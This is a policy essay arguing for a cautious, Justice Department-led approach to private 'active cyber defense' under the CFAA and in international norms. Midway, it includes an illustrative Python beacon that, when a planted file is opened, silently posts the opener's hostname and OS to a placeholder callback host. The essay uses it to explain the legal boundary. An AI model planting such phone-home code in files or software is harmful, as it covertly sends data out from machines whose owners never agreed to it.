Self-Help in Cyberspace: A Path Forward
Recent years have seen sustained calls to “unleash” the private sector to more assertively combat cyber threats. The argument has gained some sympathy in Congress, where Rep. Tom Graves (R-Ga.) recently reintroduced the Active Cyber Defense Certainty Act (ACDCA). As Bobby Chesney summarizes, the act, if passed, would amend the Computer Fraud and Abuse Act (CFAA) to allow private entities, under certain conditions, to engage in defensive measures that intrude into attackers’ networks for purposes of attributing, disrupting or monitoring malicious activity.
Motivating this renewed push for active defense is a growing recognition of the magnitude of the peril that cyberattacks present to the private sector, along with the limits on the government’s ability to arrest that growth and bring the perpetrators to justice. As former director of the National Security Agency Gen. Michael Hayden put it, “[T]he cyber cavalry ain’t coming.” However, notwithstanding the benefits of harnessing private-sector expertise to improve cyber defense, the ACDCA is premature, of uncertain efficacy, and potentially risky from both domestic and international perspectives. A dual-track approach is therefore essential: The United States should prudently explore acceptable domestic parameters for the practice of private-sector “self-help” in cyberspace and engage other nations to harmonize these standards internationally. The Justice Department can lead such an approach and—by exercising prosecutorial discretion within the limits of existing law—begin to define the scope and parameters for responsible private-sector conduct in this domain.
The reintroduction of the ACDCA has predictably elicited two familiar sets of objections. The first is that any effort to create space for more assertive defenses is dangerous; the second is that such efforts are unnecessary or even irrelevant. The former objection resurfaces long-standing opposition to private-sector “hacking back,” citing the risks of collateral damage from misattribution, escalation, abuse by corporations seeking competitive advantage, interference with government operations, and the potential to trigger an international incident when defensive measures cross national boundaries. The latter objection stems from the belief that such a move would have dubious utility, as it would hardly change the calculus for most corporations weighing active cyber defense. In this view, what holds corporations back from practicing more assertive cyber defense at present is not only legal constraints (which companies can bypass if they wish by using proxies and foreign operating bases) but also concerns over uncertain efficacy, liability and reputational damage. Moreover, the ACDCA addresses only criminal liability under the CFAA, giving corporations little clarity about state laws and the various electronic-surveillance statutes that may also be in play.
There are growing signs that some corporations already offer active defense services (including some of the most aggressive and reckless forms) within the rapidly growing global industry of cybersecurity providers, and many nations lack the resources or the motivation to monitor or police such activity. And demand for active cyber defense is likely to rise further as cyberattacks grow more frequent and costly. In this transnational context, the rules of the road for private actors’ self-help are even less discernible.
“People are conducting active defense,” as Gen. Hayden argues, and “at some point the government’s going to want to control it. And the only way you can control it, is to organize it, and grant some authorities.” Yet balancing the various interests at stake—privacy and accountability alongside security and the protection of corporate equities—is difficult in the absence of clear-cut use cases and extensive experience with active defense practices. Drawing these practices into the open is thus essential in order to inform sound judgment. And time is of the essence in doing so.
Such an arrangement, in which the government organizes active defense and grants defined authorities, would be clearly superior to the murky present situation, which leaves it to the general counsels of corporations (and in some cases their top management) to navigate the uncertain application of numerous laws based on their risk appetites and defensive needs. Clearer delineation would be especially helpful for corporations that otherwise lack the resources and legal acumen to engage in such internal deliberations—which is to say, all but the most sophisticated companies.
In addition to setting clear outer boundaries on the permissible space for corporate engagement in active cyber defense, it is important to stipulate that even within this limited spectrum, corporations should not be incentivized to take a more assertive posture in defense of their equities. Instead, they ought merely to be given the latitude to weigh, both in general and in each case they face, the risks and costs of inaction against the potential benefits of legally permitted defensive measures and the risks that such action could pose. Both action and inaction could affect a company’s operations, reputation, third-party liabilities and so on. It is important to consider not just legal limits but the entire incentive structure shaping this calculus. In the real world, insurance, civil liability and other market forces often play central roles in defining the de facto norms and parameters of responsible self-help.
Given that empirical data on the actual practice of active cyber defense is simply unavailable—at least publicly, as those who engage in it are unlikely to admit to it—all that is possible for now is to consider the hypothetical benefits and drawbacks of self-help in cyberspace. We have done so elsewhere, identifying the circumstances and conditions that should define responsible conduct, as well as specific measures that could conceivably be legally entrusted to corporate discretion because they potentially offer clear benefits to cybersecurity and manageable risks. The challenge now is to codify these distinctions between legitimate and illegitimate self-defense in cyberspace.
In the physical world, the difference between legitimate and illegitimate self-defense turns on a range of salient distinctions: the nature of the activity, the circumstances that authorize action, the manner of conduct and so on. Yet in cyberspace, legitimate self-defense is currently defined in practice largely by a single parameter: the boundary of the network. Actions whose effects are confined solely to the defender’s network are generally fair game under the CFAA, while potentially any effect on the system of the attacker or a third party risks violating the legal prohibition on accessing another computer “without authorization.” Some active defense measures, like beaconing, ought to be considered noncontentious, whereas others, like the kind of “digital booby trap” described by Gregory Falco and Herb Lin, would need to be carefully circumscribed to minimize risks to third parties notwithstanding the promise they hold.
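To make the network-boundary distinction concrete, consider beaconing. The sketch below is purely illustrative and of our own construction; the callback URL and the fields reported are hypothetical placeholders, not any real service or product. It shows a minimal beacon that, when a planted file is opened, reports back to the defender where it is running. The salient point is that this code executes on whatever machine opens the file, potentially the attacker’s, which is why even a comparatively benign measure falls on the far side of the current legal line once its effects reach beyond the defender’s own network.

```python
# Hypothetical illustration only: a minimal "beacon" of the kind discussed above.
# The callback URL and report fields are placeholders, not a real service.
# Note that this code runs on whatever machine opens the planted file --
# potentially the attacker's -- which is why even benign beaconing can
# implicate the CFAA's "without authorization" prohibition once its effects
# leave the defender's own network.

import json
import platform
import socket
import urllib.request

CALLBACK_URL = "https://defender.example.com/beacon"  # placeholder endpoint


def phone_home() -> None:
    """Report basic information about the host that opened the planted file."""
    report = {
        "hostname": socket.gethostname(),
        "os": platform.platform(),
    }
    data = json.dumps(report).encode("utf-8")
    req = urllib.request.Request(
        CALLBACK_URL,
        data=data,
        headers={"Content-Type": "application/json"},
    )
    try:
        # Best-effort notification; failures are silently ignored.
        urllib.request.urlopen(req, timeout=5)
    except OSError:
        pass


if __name__ == "__main__":
    phone_home()
```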
To its credit, the proposed ACDCA, in its effort to redraw the boundaries of permissible active defense, offers a number of such additional distinctions and considerations. These include defining the legitimate aims and permissible impacts of acceptable active cyber defense to exclude, for instance, measures that would intentionally destroy others’ data or recklessly cause physical harm. But this effort inevitably runs up against a sobering reality: The paucity of data and pertinent experience, along with the constant evolution of technology and cyber threats, precludes definitive judgments about where to draw the line between permissible and prohibited forms of private self-defense in cyberspace. Moreover, any such analysis must take into account the implications of a unilateral approach in what is an inescapably interconnected and interdependent global cyberspace. Even if active cyber defense is permitted in the United States, measures affecting foreign networks would in all likelihood still violate other countries’ domestic analogues of the CFAA and could trigger demands for extradition.
This state of affairs leads us to recommend that any amendment to the CFAA should be preceded by a period of cautious experimentation with boundary setting and the collection of empirical data to assess the impact of such delineation. In between the undesirable extremes of inaction and “opening the floodgates,” there are intermediate options worth serious consideration. The Justice Department (or possibly the Department of Homeland Security) can lead such an approach, gradually creating space for responsible self-help while maintaining the ability to constrain that space quickly if necessary.
Toward that end, we have proposed a set of foundational principles that could inform Justice Department efforts to define the parameters of self-help. These encompass but go beyond the principles embodied in the current text of the ACDCA. They limit the purposes of defensive measures exclusively to preventing, disrupting or mitigating the damage of an attack; monitoring threats; or attributing attacks. They begin by taking the riskiest measures off the table, leaving only those that would conceivably be necessary and proportionate to the threats faced. The employment of measures within this limited spectrum should then be conditional on certain prerequisites: minimum qualifications for personnel or certification of the measures employed; formal authorization and oversight by top management; notification of law enforcement; contingency plans for unintended effects; and basic preventive “cyber hygiene” before any more assertive options are contemplated. These and other, more burdensome requirements can increase along the spectrum of defensive measures—for instance, more extensive reporting to de-conflict with government actors and third-party liability coverage for any measure with potential out-of-network impacts. The need to obtain insurance coverage itself creates an important barrier to entry for unqualified operators—precisely why such requirements are widely used to govern the conduct of private investigators and private maritime (anti-piracy) security contractors. Active cyber defense, similarly, could be confined largely to cybersecurity providers and major technology corporations with the capacity to execute such sophisticated techniques. It could even be confined to measures developed and certified by the Department of Homeland Security or another capable actor. Through such principles and requirements, the spirit of the ACDCA’s call for only “qualified defenders” to undertake active cyber defense with “extreme caution” can be realized in practice.
At a minimum, these principles could form the basis of criteria used by the Justice Department in prosecuting violations of the CFAA. Ideally, the department could proactively issue guidelines clarifying the conditions under which it will exercise prosecutorial discretion in enforcing the CFAA’s prohibition on unauthorized access. This could come in the form of setting “enforcement priorities,” as has been practiced in other areas. In other words, the Justice Department could define certain circumstances in which it would not seek criminal prosecution of corporations engaging in unauthorized access for legitimate defense of themselves or their clients. Some form of notification or reporting requirements for private actors, along with a mechanism for the Justice Department to monitor behavior, would give the department flexibility to adjust the guidelines as experience accumulates.
In either case, during this interim period the prospect of civil liability for disruption or harm to third parties (or excessive harm to the attacker) would act as a further hedge against overly assertive conduct. Insurers underwriting cyber risks could cover such third-party liabilities and, in the process, moderate the behavior of defenders and induce further caution (through prerequisites, coverage exclusions and the like). In this way, insurers would act as a “proxy regulator,” further circumscribing the practice of self-help within the limits defined by law. As noted above, insurance has customarily played this role in analogous areas, such as the use of private security contractors. In the process, the insurance industry may become the repository of the insights and data needed to inform future debates over the efficacy of active cyber defense.
Congress could go one step further in a variation of this proposal by passing a statute authorizing the attorney general (or possibly the secretary of homeland security) to develop formal regulations for active cyber defense, including a sunset provision under which the regulations would expire after a few years. This would lend further authority to the guidelines and reduce the lingering uncertainty that corporations would face were the Justice Department to go it alone in articulating its enforcement priorities. After all, such priorities could change with the next administration, and, in any event, they could leave corporations open to prosecution under individual states’ statutes similar to the CFAA (though the prospect of such action would not loom large if corporations confined their active cyber defense practices to the parameters advocated here). A federal legislative solution could preempt state laws and provide a more stable outlook for corporations.
The fact that active cyber defense activities are likely being undertaken even now—and, as far as we’re aware, no entity has been prosecuted for such practice—suggests that there is a broad understanding that corporations need to defend their equities, or at least that prosecuting such cases is not a priority for the Justice Department. At least some private actors are already willing to push the boundaries. Bringing clarity to this space might dissuade corporations from contemplating the riskiest behavior, while encouraging more corporations to engage in some reasonable form of active cyber defense.
Whichever form of action the U.S. takes on the domestic front, a parallel effort must be made to align U.S. practices with the evolution of corresponding norms internationally. This is essential in order to address the global ramifications of a more lenient U.S. environment and to minimize the prospect of legal action—including extradition requests—against U.S. entities engaging in or commissioning active cyber defense. Ideally, this would take the form of an international dialogue aimed at converging on a common understanding of the circumstances that justify self-help responses to malicious cyber activity and the permissible parameters that should govern such action.
The U.N. Group of Governmental Experts and, even more importantly, the Budapest Convention on Cybercrime provide solid platforms for such discussions. The Budapest Convention commits signatories to criminalize certain cyber offenses when conduct occurs “without right.” As Paul Rosenzweig notes, this leaves room for states to determine when otherwise illegal activity might be justified. Furthermore, the convention’s Explanatory Report explicitly offers self-defense as one such potential justification. Even an informal dialogue among states and key corporate, technology and civil society players on the emerging norms around self-help in cyberspace would be beneficial.
This proactive approach to experimentation with self-help will not resolve the cybersecurity challenge, and it does entail some moderate risk taking. But it is clearly superior to the alternatives: either keeping the currently murky situation as is, or opening the floodgates to overly aggressive and risky actions. Testing the boundaries of active cyber defense may be the only way to begin to turn the tide against the perpetrators of cyberattacks.